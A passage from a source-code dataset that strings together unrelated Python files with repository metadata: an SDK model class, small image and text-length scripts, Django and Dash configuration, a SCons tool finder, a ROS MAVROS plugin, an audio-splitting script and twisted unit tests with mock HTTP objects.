"""Gets the node_type of this RealTimeNodeStatus.
:return: The node_type of this RealTimeNodeStatus.
:rtype: str
"""
return self._node_type
@node_type.setter
def node_type(self, node_type):
"""Sets the node_type of this RealTimeNodeStatus.
:param node_type: The node_type of this RealTimeNodeStatus.
:type: str
"""
self._node_type = node_type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        # Delegate to the JSON serialization so debug output shows field values.
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        # Only instances of the same model class can compare equal.
        if not isinstance(other, RealTimeNodeStatus):
            return False
        # Compare the full attribute dicts (includes the private _x fields).
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
2331d0e0f00d297ccd75ec6e7683667fd0388d71 | e8315819558941a30e6dabbff9009a0a398720c6 | /4YP_PiCom_Transmitter/cat_to_bw.py | bce4481cb87368ef87dfd1d8a738f9cb4631c06c | [] | no_license | jmpotter97/4YP_PiCom | 2da19b5cb065d99715c661d360233b2a97163815 | 99b4c50cc594076a066f2b21b46a40d83b5c9143 | refs/heads/master | 2020-03-29T19:03:24.207624 | 2019-04-26T12:11:09 | 2019-04-26T12:11:09 | 150,245,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | import imageio as io
# Load the image as 8-bit grayscale (Pillow "L" mode) and save the converted copy.
img = io.imread('cat2.jpg', pilmode = 'L')
io.imwrite('cat2_bw.jpg', img)
| [
"jmpotter97@gmail.com"
] | jmpotter97@gmail.com |
52e5fae633592567321cc89024bcd5209754514a | 078fda8280f40078f4dbfa07ce794c817582b7f5 | /oneone/wsgi.py | 608985e7d5e123ed00b17993162574124f1d8df9 | [] | no_license | sylvia198591/Bank-Application-Class-based-Views | 4c37a106b36ac76c1ccd5176d70cee76c0a7c3e5 | 404063a69b89fac15321ed8b07662e64ac4f5ba2 | refs/heads/master | 2023-03-06T16:08:30.012280 | 2021-02-23T08:29:40 | 2021-02-23T08:29:40 | 341,360,709 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
WSGI config for oneone project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings, then expose the standard WSGI callable.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'oneone.settings')
application = get_wsgi_application()
| [
"sylvia.anitha@gmail.com"
] | sylvia.anitha@gmail.com |
bf490503f9be519f8a1d25b1335c457e1faa3a3d | 0972d944bfb0352ba787deb9554a7a532b73872a | /length.py | 874220c3473c63b65a5c3e53d74b9c858bcd9e3a | [] | no_license | abhilashasancheti/CSR-Project | 8ef37dce011bb2c80928375104b9ceb98d7f4fb3 | 67e1b8a6746cf55fa6baba4b66d702ff04797a88 | refs/heads/main | 2023-05-07T00:02:22.088224 | 2021-06-01T08:53:11 | 2021-06-01T08:53:11 | 315,123,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 530 | py | import os
import numpy as np
def calc_length(path):
    """Return (min, max, mean) of the whitespace-token count per line of *path*."""
    with open(path) as handle:
        counts = [len(row.split()) for row in handle]
    return np.min(counts), np.max(counts), np.mean(counts)
print("hella_p", calc_length('./HellaSwag/mtl_common_hellaswag_train.txt'))
print("joci", calc_length('./JOCI/mtl_common_joci_train.txt'))
print("anli", calc_length('./aNLI/mtl_common_anli_train.txt'))
print("defeasible", calc_length('./defeasible/mtl_common_defeasible_train.txt')) | [
"sancheti@clipsub00.umiacs.umd.edu"
] | sancheti@clipsub00.umiacs.umd.edu |
e5cc439e0b34ca33b3d001bd387a2a4479ab0b82 | 5f332fd35e0071b6c33727b1ec7b22efefd4182a | /lib/sconstool/util/finder_.py | 84618a3615bf73a74897f7ec62a7cd00982180de | [
"MIT"
] | permissive | ptomulik/scons-tool-util | ec4bc3f6971feda4fa918632b0f0431faf96779b | daab1c7db087feb988a721bf10e6b5c29c0e02b2 | refs/heads/master | 2021-08-07T12:20:17.485348 | 2020-04-15T18:48:28 | 2020-04-15T18:48:28 | 153,349,258 | 1 | 0 | null | 2020-04-15T18:49:16 | 2018-10-16T20:23:55 | Python | UTF-8 | Python | false | false | 5,721 | py | # -*- coding: utf-8 -*-
"""Provides the :class:`.ToolFinder` class.
"""
from . import misc_
import os
__all__ = ('ToolFinder',)
class ToolFinder(object):
    """Callable object which searches for executables.
    A single ToolFinder instance searches for a single file (program), for
    example a compiler executable or script interpreter. The constructor
    accepts several options, for each option there is corresponding
    @property (read-only) with the same name.
    :Example: Typical use in a tool module
    .. code-block:: python
        from sconstool.util import ToolFinder
        foo = ToolFinder('foo')
        def generate(env):
            env.SetDefault(FOO=foo(env))
            # ...
        def exists(env):
            return env.get('FOO', foo(env))
    """
    # Only these two slots exist; all option values live in the _kw dict and
    # are exposed through the read-only properties installed below the class.
    __slots__ = ('_tool', '_kw')
    # The full set of keyword arguments accepted by the constructor.
    _ctor_kwargs = ('name',
                    'path',
                    'pathext',
                    'reject',
                    'priority_path',
                    'fallback_path',
                    'strip_path',
                    'strip_priority_path',
                    'strip_fallback_path')
    def __init__(self, tool, **kw):
        """
        :param str tool:
            symbolic name of the tool,
        :keyword str,list name:
            base name of the file (program name) being searched for,
            may be a list of alternative program names,
        :keyword str,list path:
            search path to be used instead of the standard SCons PATH,
        :keyword str,list pathext:
            a list of file extensions to be considered as executable,
        :keyword list reject:
            a list of paths to be rejected,
        :keyword str,list priority_path:
            extra search path to be searched prior to :attr:`.path`,
        :keyword str,list fallback_path:
            extra search path to be searched after :attr:`.path`,
        :keyword bool strip_path:
            if ``True`` (default), the leading path, if it's in :attr:`path`
            list, will be stripped from the returned file path,
        :keyword bool strip_priority_path:
            if ``True``, the leading path, if it's in **priority_path**
            list, will be stripped from the returned file path;
        :keyword bool strip_fallback_path:
            if ``True``, the leading path, if it's in **fallback_path** list,
            will be stripped from the returned file path.
        """
        self._tool = str(tool)
        # Rejects unknown keyword arguments before they are stored.
        misc_.check_kwargs('ToolFinder()', kw, self._ctor_kwargs)
        self._kw = kw
    @property
    def tool(self):
        """Tool name, that was passed in to the c-tor as an argument.
        :rtype: str
        """
        return self._tool
    def __call__(self, env):
        """Performs the actual search.
        :param env:
            a SCons environment; provides construction variables and the
            ``env.WhereIs()`` method to the :class:`.ToolFinder`.
        :return:
            depending on options chosen at object creation, a name or a
            path to the executable file found. If the program can't be
            found, ``None`` is returned.
        :rtype: str
        """
        return self._search(env)
    def _whereis(self, env, prog, where):
        # *where* names one of the path options ('path', 'priority_path', ...);
        # the corresponding property supplies the actual search path.
        path = getattr(self, where)
        if path and not isinstance(path, str):
            # this trick enables variable substitution in list entries
            path = os.path.pathsep.join(path)
        return env.WhereIs(prog, path, self.pathext, self.reject)
    def _adjust_result(self, env, result, where):
        # *result* is a (prog, found_path) pair; env.subst() expands SCons
        # construction variables that may appear in the program name.
        prog = env.subst(result[0])
        strip = getattr(self, 'strip_%s' % where)
        if os.path.isabs(prog) or strip:
            # Return just the program name when stripping is requested (or the
            # name was absolute to begin with); otherwise the full found path.
            return prog
        return result[1]
    def _search_in(self, env, where):
        # self.name may be a single string or a list of alternative names.
        progs = self.name
        if isinstance(progs, str):
            progs = [progs]
        for prog in progs:
            found = self._whereis(env, prog, where)
            if found:
                return self._adjust_result(env, (prog, found), where)
        return None
    def _search(self, env):
        # Fixed search order: priority_path first, then path, then fallback_path.
        for where in ('priority_path', 'path', 'fallback_path'):
            found = self._search_in(env, where)
            if found:
                return found
        return None
    @classmethod
    def _add_getter(cls, attr, default=None, **kw):
        # Installs a read-only property for *attr* that reads from the _kw
        # dict.  The `doc` templates below are runtime values: the %(...)s
        # placeholders are presumably interpolated by
        # misc_.add_ro_dict_property — do not edit them as mere comments.
        if isinstance(default, property):
            default = default.fget
            kw['defaultattr'] = default.__name__
            doc = """\
            The value of **%(attr)s** keyword argument passed in to the
            constructor at object creation, or ``self.%(defaultattr)s`` if the
            argument was omitted.
            :rtype: %(rtype)s
            """
        else:
            doc = """\
            The value of **%(attr)s** keyword argument passed in to the
            constructor at object creation, or ``%(default)r`` if the
            argument was omitted.
            :rtype: %(rtype)s
            """
        kw = dict({'doc': doc}, **kw)
        misc_.add_ro_dict_property(cls, '_kw', attr, default, **kw)
# Install the read-only option properties on ToolFinder.  Each mirrors a
# constructor keyword and falls back to the documented default value
# (for 'name' the default is the `tool` property itself).
TF = ToolFinder
TF._add_getter('name', TF.tool, rtype='str')
TF._add_getter('path', rtype='str,list')
TF._add_getter('priority_path', [], rtype='str,list')
TF._add_getter('fallback_path', [], rtype='str,list')
TF._add_getter('pathext', rtype='str,list')
TF._add_getter('reject', [], rtype='list')
TF._add_getter('strip_path', True, rtype='bool')
TF._add_getter('strip_priority_path', False, rtype='bool')
TF._add_getter('strip_fallback_path', False, rtype='bool')
del TF
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set ft=python et ts=4 sw=4:
| [
"ptomulik@meil.pw.edu.pl"
] | ptomulik@meil.pw.edu.pl |
6b0da10b62a3ac5c7cb7a4698512741531809eb2 | 5430e0a58f120136e1fca71e38477a2085af703c | /rqt_rotors/src/rqt_rotors/hil_plugin.py | a7adffcb2263211a0fe5d717f243a9a5ebda4792 | [
"Apache-2.0"
] | permissive | gsilano/CrazyS | 145fb8dd35cd3279a95d30bdd95a80a0f34e7fdd | 66d62dd52b8588c6a23258be8228e1a13646d610 | refs/heads/master | 2023-05-22T11:55:28.717481 | 2022-08-11T14:57:06 | 2022-08-11T14:57:06 | 122,210,674 | 161 | 96 | Apache-2.0 | 2022-04-02T16:09:23 | 2018-02-20T14:42:23 | C++ | UTF-8 | Python | false | false | 5,534 | py | #!/usr/bin/env python
import os
import rospy
import rospkg
from mavros_msgs.msg import State
from mavros_msgs.srv import CommandBool
from mavros_msgs.srv import CommandLong
from mavros_msgs.srv import SetMode
from qt_gui.plugin import Plugin
from python_qt_binding import loadUi
from python_qt_binding import QtCore
from python_qt_binding.QtCore import QTimer, Slot
from python_qt_binding.QtGui import QWidget, QFormLayout
import time
class HilPlugin(Plugin):
    """rqt plugin that toggles MAVROS HIL mode, arms the vehicle and can
    reboot the autopilot, driven by /mavros/state heartbeats."""
    # MAV mode flags
    MAV_MODE_FLAG_SAFETY_ARMED = 128
    MAV_MODE_FLAG_MANUAL_INPUT_ENABLED = 64
    MAV_MODE_FLAG_HIL_ENABLED = 32
    MAV_MODE_FLAG_STABILIZE_ENABLED = 16
    MAV_MODE_FLAG_GUIDED_ENABLED = 8
    MAV_MODE_FLAG_AUTO_ENABLED = 4
    MAV_MODE_FLAG_TEST_ENABLED = 2
    MAV_MODE_FLAG_CUSTOM_MODE_ENABLED = 1
    # MAV state dictionary
    # NOTE(review): mav_state and mav_status are defined/initialized but never
    # read anywhere in this class — possibly left over from an earlier version.
    mav_state = {0: 'Uninitialized',
                 1: 'Booting up',
                 2: 'Calibrating',
                 3: 'Standby',
                 4: 'Active',
                 5: 'Critical',
                 6: 'Emergency',
                 7: 'Poweroff'}
    # Constants
    STR_ON = 'ON'
    STR_OFF = 'OFF'
    STR_UNKNOWN = 'N/A'
    STR_MAVROS_ARM_SERVICE_NAME = '/mavros/cmd/arming'
    STR_MAVROS_COMMAND_LONG_SERVICE_NAME = '/mavros/cmd/command'
    STR_MAVROS_SET_MODE_SERVICE_NAME = '/mavros/set_mode'
    STR_SYS_STATUS_SUB_TOPIC = '/mavros/state'
    TIMEOUT_HIL_HEARTBEAT = 2.0
    def __init__(self, context):
        super(HilPlugin, self).__init__(context)
        self.setObjectName('HilPlugin')
        self._widget = QWidget()
        # NOTE(review): `rp` is unused — RosPack() is instantiated again on
        # the next line.
        rp = rospkg.RosPack()
        ui_file = os.path.join(rospkg.RosPack().get_path('rqt_rotors'), 'resource', 'HilPlugin.ui')
        loadUi(ui_file, self._widget)
        self._widget.setObjectName('HilPluginUi')
        if context.serial_number() > 1:
            self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % context.serial_number()))
        context.add_widget(self._widget)
        # Set the initial parameters of UI elements
        # Buttons stay disabled until the first connected heartbeat arrives.
        self._widget.button_set_hil_mode.setEnabled(False)
        self._widget.button_arm.setEnabled(False)
        self._widget.button_reboot_autopilot.setEnabled(False)
        self._widget.text_state.setText(self.STR_UNKNOWN)
        self.clear_mav_mode()
        # Initialize class variables
        self.last_heartbeat_time = time.time()
        self.mav_mode = 65
        self.mav_status = 255
        self.armed = False
        self.connected = False
        self.guided = False
        self.hil_enabled = False
        # Set the functions that are called when signals are emitted
        self._widget.button_set_hil_mode.pressed.connect(self.on_set_hil_mode_button_pressed)
        self._widget.button_arm.pressed.connect(self.on_arm_button_pressed)
        self._widget.button_reboot_autopilot.pressed.connect(self.on_reboot_autopilot_button_pressed)
        # Create ROS service proxies
        self.arm = rospy.ServiceProxy(self.STR_MAVROS_ARM_SERVICE_NAME, CommandBool)
        self.send_command_long = rospy.ServiceProxy(self.STR_MAVROS_COMMAND_LONG_SERVICE_NAME, CommandLong)
        self.set_mode = rospy.ServiceProxy(self.STR_MAVROS_SET_MODE_SERVICE_NAME, SetMode)
        # Initialize ROS subscribers and publishers
        self.sys_status_sub = rospy.Subscriber(self.STR_SYS_STATUS_SUB_TOPIC, State, self.sys_status_callback, queue_size=1)
    def on_set_hil_mode_button_pressed(self):
        """Enable the HIL flag in the current MAV mode and push it via set_mode."""
        new_mode = self.mav_mode | self.MAV_MODE_FLAG_HIL_ENABLED
        self.hil_enabled = True
        self.mav_mode = new_mode
        self.set_mode(new_mode, '')
        self._widget.text_mode_hil.setText(self.mav_mode_text(self.hil_enabled))
    def on_arm_button_pressed(self):
        """Request arming through the MAVROS arming service."""
        self.arm(True)
    def on_reboot_autopilot_button_pressed(self):
        # Command 246 with param1=1 — presumably MAV_CMD_PREFLIGHT_REBOOT_SHUTDOWN
        # (reboot autopilot); confirm against the MAVLink command list.
        self.send_command_long(False, 246, 1, 1, 0, 0, 0, 0, 0, 0)
    def sys_status_callback(self, msg):
        """Track /mavros/state heartbeats and mirror them into the UI."""
        # First heartbeat after startup: unlock the buttons and initialize the
        # displayed flags, then return without the re-assert/update logic below.
        if (not self.connected and msg.connected):
            self._widget.button_set_hil_mode.setEnabled(True)
            self._widget.button_arm.setEnabled(True)
            self._widget.button_reboot_autopilot.setEnabled(True)
            self.connected = True
            self.last_heartbeat_time = time.time()
            self._widget.text_mode_safety_armed.setText(self.mav_mode_text(msg.armed))
            self._widget.text_mode_guided.setText(self.mav_mode_text(msg.guided))
            return
        # Re-assert HIL mode if no heartbeat was seen for TIMEOUT_HIL_HEARTBEAT.
        if (((time.time() - self.last_heartbeat_time) >= self.TIMEOUT_HIL_HEARTBEAT) and self.hil_enabled):
            new_mode = self.mav_mode | self.MAV_MODE_FLAG_HIL_ENABLED
            self.set_mode(new_mode, '')
        if (self.armed != msg.armed):
            self.armed = msg.armed
            self._widget.text_mode_safety_armed.setText(self.mav_mode_text(self.armed))
            self._widget.button_arm.setEnabled(not(self.armed))
            # NOTE(review): this ORs SAFETY_ARMED into mav_mode on ANY change of
            # the armed state — including a disarm transition. The flag is never
            # cleared; confirm whether that is intended.
            self.mav_mode = self.mav_mode | self.MAV_MODE_FLAG_SAFETY_ARMED
        if (self.guided != msg.guided):
            self.guided = msg.guided
            self._widget.text_mode_guided.setText(self.mav_mode_text(self.guided))
        self.last_heartbeat_time = time.time()
    def clear_mav_mode(self):
        """Reset every value field in the MAV-mode form layout to 'N/A'."""
        count = self._widget.mav_mode_layout.rowCount()
        for i in range(count):
            self._widget.mav_mode_layout.itemAt(i, QFormLayout.FieldRole).widget().setText(self.STR_UNKNOWN)
    def mav_mode_text(self, mode_enabled):
        # Boolean flag -> 'ON'/'OFF' label text.
        return self.STR_ON if mode_enabled else self.STR_OFF
    def shutdown_plugin(self):
        # Unsubscribe from /mavros/state when the plugin is torn down.
        if self.sys_status_sub is not None:
            self.sys_status_sub.unregister()
| [
"g.silano89@gmail.com"
] | g.silano89@gmail.com |
f6325cdee89668b585f012a30c7130e6022150fc | 91d1a6968b90d9d461e9a2ece12b465486e3ccc2 | /clouddirectory_write_f/schema_delete.py | 58f82c7195d72611e6c1e62d27b86b09d9f7b063 | [] | no_license | lxtxl/aws_cli | c31fc994c9a4296d6bac851e680d5adbf7e93481 | aaf35df1b7509abf5601d3f09ff1fece482facda | refs/heads/master | 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | #!/usr/bin/python
# -*- codding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import write_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-instances.html
if __name__ == '__main__':
    """
    apply-schema : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/clouddirectory/apply-schema.html
    create-schema : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/clouddirectory/create-schema.html
    publish-schema : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/clouddirectory/publish-schema.html
    update-schema : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/clouddirectory/update-schema.html
    """
    # NOTE(review): the URL list above omits delete-schema, which is the
    # command actually issued below — presumably copied from a sibling script.
    write_parameter("clouddirectory", "delete-schema")
"hcseo77@gmail.com"
] | hcseo77@gmail.com |
108d86ff6f789338762a8350d686091b3e486850 | 3c9b19eac4f1e5bda7c07f82dc609215e8b1b519 | /clean.py | be54d17850f53404d4716fb34e3bae03e2e3c36f | [] | no_license | raprakashvi/YES_NO-ALL | ab11540fc5f114981f679f7cb40b9b05f08a92dc | f514adf59556f4c676deaff5c1b5cca6eb190034 | refs/heads/main | 2023-03-22T22:40:11.524605 | 2021-03-24T03:10:37 | 2021-03-24T03:10:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,741 | py | #From Seth Adams
import matplotlib.pyplot as plt
from scipy.io import wavfile
import argparse
import os
from glob import glob
import numpy as np
import pandas as pd
from librosa.core import resample, to_mono
from tqdm import tqdm
import wavio
def envelope(y, rate, threshold):
    """Compute a signal-envelope mask for audio signal *y*.

    The envelope is the centered rolling maximum of |y| over a window of
    rate/20 samples.  Returns ``(mask, envelope)`` where ``mask[i]`` is True
    when the envelope exceeds *threshold* at sample i.
    """
    magnitude = pd.Series(y).apply(np.abs)
    rolling_max = magnitude.rolling(window=int(rate / 20),
                                    min_periods=1,
                                    center=True).max()
    mask = [bool(point > threshold) for point in rolling_max]
    return mask, rolling_max
def downsample_mono(path, sr):
    """Read a WAV file, fold it to mono, and resample it to *sr* Hz.

    Returns ``(sr, wav)`` where ``wav`` is an int16 numpy array.
    """
    obj = wavio.read(path)
    # wavio yields integer samples; librosa's resample/to_mono expect floats.
    wav = obj.data.astype(np.float32, order='F')
    rate = obj.rate
    try:
        channel = wav.shape[1]
        if channel == 2:
            # Stereo: to_mono expects shape (channels, samples), hence the .T.
            wav = to_mono(wav.T)
        elif channel == 1:
            wav = to_mono(wav.reshape(-1))
    except IndexError:
        # wav is already 1-D (no channel axis): just flatten it.
        wav = to_mono(wav.reshape(-1))
        pass
    except Exception as exc:
        raise exc
    wav = resample(wav, rate, sr)
    # Back to 16-bit PCM so scipy.io.wavfile can write the chunks later.
    wav = wav.astype(np.int16)
    return sr, wav
def save_sample(sample, rate, target_dir, fn, ix):
    """Write one audio chunk as ``<fn>_<ix>.wav`` inside *target_dir*.

    If the destination file already exists it is left untouched, so the
    splitting step can be resumed without rewriting chunks.
    """
    stem = fn.split('.wav')[0]
    out_name = '{}_{}.wav'.format(stem, str(ix))
    out_path = os.path.join(target_dir.split('.')[0], out_name)
    if not os.path.exists(out_path):
        wavfile.write(out_path, rate, sample)
def check_dir(path):
    """Ensure the directory *path* exists.

    Uses ``os.makedirs(..., exist_ok=True)`` instead of the previous
    exists-then-mkdir pair: this removes the race with concurrent runs and
    also creates missing parent directories.
    """
    os.makedirs(path, exist_ok=True)
def split_wavs(args):
    """Clean every class subfolder of args.src_root and write fixed-length
    (args.delta_time seconds) mono chunks into mirrored folders under
    args.dst_root."""
    src_root = args.src_root
    dst_root = args.dst_root
    dt = args.delta_time
    wav_paths = glob('{}/**'.format(src_root), recursive=True)
    wav_paths = [x for x in wav_paths if '.wav' in x]
    # NOTE(review): `dirs` and `wav_paths` are computed but never used below;
    # the loop works from os.listdir instead.
    dirs = os.listdir(src_root)
    check_dir(dst_root)
    classes = os.listdir(src_root)
    for _cls in classes:
        target_dir = os.path.join(dst_root, _cls)
        check_dir(target_dir)
        src_dir = os.path.join(src_root, _cls)
        for fn in tqdm(os.listdir(src_dir)):
            src_fn = os.path.join(src_dir, fn)
            rate, wav = downsample_mono(src_fn, args.sr)
            # Keep only the samples where the envelope exceeds the threshold.
            mask, y_mean = envelope(wav, rate, threshold=args.threshold)
            wav = wav[mask]
            delta_sample = int(dt*rate)
            # cleaned audio is less than a single sample
            # pad with zeros to delta_sample size
            if wav.shape[0] < delta_sample:
                sample = np.zeros(shape=(delta_sample,), dtype=np.int16)
                sample[:wav.shape[0]] = wav
                save_sample(sample, rate, target_dir, fn, 0)
            # step through audio and save every delta_sample
            # discard the ending audio if it is too short
            else:
                trunc = wav.shape[0] % delta_sample
                for cnt, i in enumerate(np.arange(0, wav.shape[0]-trunc, delta_sample)):
                    start = int(i)
                    stop = int(i + delta_sample)
                    sample = wav[start:stop]
                    save_sample(sample, rate, target_dir, fn, cnt)
def test_threshold(args):
    """Plot keep/remove samples and the envelope for the single file whose
    path contains the substring args.fn, to visually tune args.threshold."""
    src_root = args.src_root
    wav_paths = glob('{}/**'.format(src_root), recursive=True)
    wav_path = [x for x in wav_paths if args.fn in x]
    # Require exactly one match, otherwise the plot would be ambiguous.
    if len(wav_path) != 1:
        print('audio file not found for sub-string: {}'.format(args.fn))
        return
    rate, wav = downsample_mono(wav_path[0], args.sr)
    mask, env = envelope(wav, rate, threshold=args.threshold)
    plt.style.use('ggplot')
    plt.title('Signal Envelope, Threshold = {}'.format(str(args.threshold)))
    plt.plot(wav[np.logical_not(mask)], color='r', label='remove')
    plt.plot(wav[mask], color='c', label='keep')
    plt.plot(env, color='m', label='envelope')
    plt.grid(False)
    plt.legend(loc='best')
    plt.show()
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Cleaning audio data')
    parser.add_argument('--src_root', type=str, default='wavfiles',
                        help='directory of audio files in total duration')
    parser.add_argument('--dst_root', type=str, default='clean',
                        help='directory to put audio files split by delta_time')
    parser.add_argument('--delta_time', '-dt', type=float, default=1.0,
                        help='time in seconds to sample audio')
    parser.add_argument('--sr', type=int, default=16000,
                        help='rate to downsample audio')
    parser.add_argument('--fn', type=str, default='3a3d0279',
                        help='file to plot over time to check magnitude')
    # Bug fix: this option was declared type=str, so any CLI-supplied value
    # arrived as a string and `mean > threshold` inside envelope() raised
    # TypeError on Python 3 (the int default 20 masked the bug).
    parser.add_argument('--threshold', type=float, default=20,
                        help='threshold magnitude for np.int16 dtype')
    args, _ = parser.parse_known_args()
    #test_threshold(args)
    split_wavs(args)
"mosesfuego@gmail.com"
] | mosesfuego@gmail.com |
5281cb4b6846e006b6e7a3720f1592888f6f8d12 | 4f8766f4d7227ab4881f31faaeb6b5f7abe39a3f | /app.py | 113201347b844e630843ae53ac470cc23d90edf7 | [] | no_license | eanderson-ei/essc-search | 7095db34a7db50aafd50bbf93f3b68d3f84df4a6 | da6c1395df3feca84865ddb0c30adb5f138b205e | refs/heads/main | 2023-07-14T01:08:11.574874 | 2021-08-23T19:43:15 | 2021-08-23T19:43:15 | 300,695,038 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 964 | py | import dash
import dash_bootstrap_components as dbc
import dash_auth
import json
import os
external_stylesheets = [dbc.themes.YETI] # Also try LITERA, SPACELAB
# neovis.js (Neo4j graph visualization) is injected into every served page.
external_scripts = ["https://rawgit.com/neo4j-contrib/neovis.js/master/dist/neovis.js"]
app = dash.Dash(__name__,
                external_stylesheets=external_stylesheets,
                external_scripts=external_scripts,
                show_undo_redo=True)
# Underlying Flask instance, typically referenced by WSGI servers (gunicorn etc.).
server = app.server
# Don't raise for callbacks that target components created later
# (e.g. by multi-page layouts).
app.config.suppress_callback_exceptions = True
# UNCOMMENT FOR BASIC AUTHENTICATION
# # Keep this out of source code repository - save in a file or a database
# # Local dev
# try:
# with open('secrets/passwords.json') as f:
# VALID_USERNAME_PASSWORD_PAIRS = json.load(f)
# # Heroku dev
# except:
# json_creds = os.environ.get("VALID_USERNAME_PASSWORD_PAIRS")
# VALID_USERNAME_PASSWORD_PAIRS = json.loads(json_creds)
# auth = dash_auth.BasicAuth(
# app,
# VALID_USERNAME_PASSWORD_PAIRS
# )
| [
"eanderson@enviroincentives.com"
] | eanderson@enviroincentives.com |
0f398c0f5262e9288ee7ba927428f264f7f6085c | 555dd4290421ba30d370425aa383d0bd823f33f4 | /Supermercado/market/migrations/0024_auto_20200812_1050.py | 0393aabf570edfa332756bbeaca94119c92627c7 | [] | no_license | RodrigoSHM1999/Proyecto-Final | f7e63798f6568f9078b08ff9c9487f50fd296952 | 8cdd2a6ba3d0cefb8ac817c8e40f3df1c2225616 | refs/heads/master | 2022-12-02T07:37:23.349182 | 2020-08-17T15:28:46 | 2020-08-17T15:28:46 | 278,261,049 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # Generated by Django 3.1 on 2020-08-12 15:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Re-creates Compra.product_id as a ForeignKey to Product: the previous
    # field (added in 0023) is dropped first, then the FK is added with
    # default=0 to back-fill existing rows; preserve_default=False discards
    # that default after the migration runs.
    dependencies = [
        ('market', '0023_compra_product_id'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='compra',
            name='product_id',
        ),
        migrations.AddField(
            model_name='compra',
            name='product_id',
            field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='market.product'),
            preserve_default=False,
        ),
    ]
| [
"agarciapu@unsa.edu.pe"
] | agarciapu@unsa.edu.pe |
81b307519098ba7ed57648b55ddc5404845cae3a | eeace2da37c7dc48f30ba2e376b498c13b35cc6f | /tests.py | 1ee9d08f7bceb39021f957d9def5b9eca0e425cb | [
"ISC"
] | permissive | CodeBlueDev/nanobot | 9ee1a9510fa386cebfbbaa55c06f5fab5a96fc3a | bd72797dc1db238a6860272bf90e7c95207c70ee | refs/heads/master | 2020-12-27T09:26:59.275206 | 2014-05-30T18:05:39 | 2014-05-30T18:05:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,677 | py | from twisted.trial import unittest
from twisted.internet import task, defer
import nanobot
import app
import string
class CacheTests(unittest.TestCase):
    """Exercises app.UrlCache expiry against a simulated twisted clock."""
    def setUp(self):
        # task.Clock lets the tests advance time manually instead of sleeping.
        self.clock = task.Clock()
        self.cache = app.UrlCache(reactor=self.clock, expiration=60)
        self.cache.enable()
    def tearDown(self):
        self.cache.disable()
    def testGetReaperNotRun(self):
        self.cache.update("foo", "bar")
        self.assertEquals(self.cache.fetch("foo"),
                          "bar", "Expected cache to have 'foo' for 'bar'")
    def testReaperExpiresItem(self):
        self.cache.update("foo", "bar")
        self.assertEquals(self.cache.fetch("foo"),
                          "bar", "Expected cache to have 'foo' for 'bar'")
        # Jump exactly to the expiration boundary: the entry must be gone.
        self.clock.advance(60)
        value = self.cache.fetch("foo")
        self.assertIs(value, None,
                      "Cache had '%s' for entry 'foo'" % value)
    def testReaperLeavesItem(self):
        # Insert just before the reaper tick; a refresh at the tick keeps it.
        self.clock.advance(59)
        self.cache.update("foo", "bar")
        self.assertEquals(self.cache.fetch("foo"),
                          "bar", "Expected cache to have 'foo' for 'bar'")
        self.clock.advance(1)
        self.cache.update("foo", "bar")
        self.assertEquals(self.cache.fetch("foo"),
                          "bar", "Expected cache to have 'foo' for 'bar'")
class IgnorantCache(object):
    """Cache stand-in that remembers nothing: every fetch misses and every
    update is discarded."""

    def __init__(self):
        pass

    def fetch(self, key):
        return None

    def update(self, key, value):
        return None
class MockResponse(object):
    """Minimal treq-response double exposing ``.code``, ``.data`` and a
    header lookup keyed by lower-cased header names."""

    def __init__(self, data, headers, code):
        self.data = data
        self.code = code
        self._headers = headers

    @property
    def headers(self):
        # Real treq responses expose a separate headers object; this double
        # simply returns itself so getRawHeaders() can be called on it.
        return self

    def getRawHeaders(self, key):
        return self._headers[key.lower()]
class MockTreq(object):
    """treq stand-in serving one canned response for a single expected URL."""

    def __init__(self, url, data, headers, code=None):
        self.url = url
        self.data = data
        self.headers = headers
        self.code = code or 200

    def _require_url(self, url):
        # Any request for a different URL is a test error.
        if not self.url == url:
            raise Exception("Wrong URL, got %s, expected %s" % (url, self.url))

    def get(self, url, timeout=None, headers={}):
        self._require_url(url)
        return defer.succeed(MockResponse(self.data, self.headers,
                                          code=self.code))

    def head(self, url, timeout=None, headers={}):
